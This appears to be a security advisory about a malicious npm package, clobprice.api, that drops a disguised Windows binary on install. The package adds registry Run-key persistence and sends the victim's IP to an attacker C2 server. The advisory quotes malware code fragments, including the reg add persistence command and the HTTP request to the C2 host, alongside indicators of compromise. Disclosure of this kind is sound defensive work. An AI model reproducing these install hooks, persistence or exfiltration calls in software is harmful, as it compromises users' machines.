VDB
GCVE-110-OSM-2026-4748
GCVE-110-OSM-2026-4748
Advisory PublishedCVSS 9.6/10
Drops and executes a PE binary (SHA256: 300a7dea05c2a588757010ad314fa55cb8ef3acebaa284f58a5cd0fd39bce478, disguised as 'windows defender host.exe') via postinstall hook, installs Windows registry Run-key persistence via a VBScript launcher, and exfiltrates the victim's public IP to attacker C2 at 45.8.22.112:2026. Part of an active campaign by devcarron@gmail.com who published three versions within 7 hours; shares identical IPFS CID, PE hash, and C2 as sibling packages clob.api and @devcarron/clob.
**Trigger** (`postinstall`): `node clob.js` executes immediately on `npm install`.
**Payload delivery (Windows only)**: downloads PE binary disguised as 'windows defender host.exe' via four IPFS gateway fallbacks (primary: `violet-tricky-quelea-562.mypinata.cloud`, fallbacks: `cloudflare-ipfs.com`, `gateway.pinata.cloud`, `ipfs.io`) using IPFS CID `bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa`; PE SHA256: 300a7dea05c2a588757010ad314fa55cb8ef3acebaa284f58a5cd0fd39bce478. macOS and Linux gateway lists are `null` — dropper exits on non-Windows.
**Hidden execution**: writes a VBScript launcher (`-launcher.vbs`) and spawns it via `wscript.exe //nologo` with `{detached: true, windowsHide: true}` then `child.unref()` — payload runs invisibly with no taskbar entry.
**Persistence (Windows)**: `execSync('reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "clob" /t REG_SZ /d "wscript.exe //nologo <vbs>" /f')` — reinstalls at every user login.
**IP exfiltration**: `https.get('https://api.ipify.org')` retrieves victim public IP, then `http.request({hostname: '45.8.22.112', port: 2026, path: '/api/urls?url=<ip>:80', method: 'POST'})` transmits it to attacker C2.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | clobprice.api | — | — |
Browse GCVE Records
73,443 records in the GCVE database · Updated July 18, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.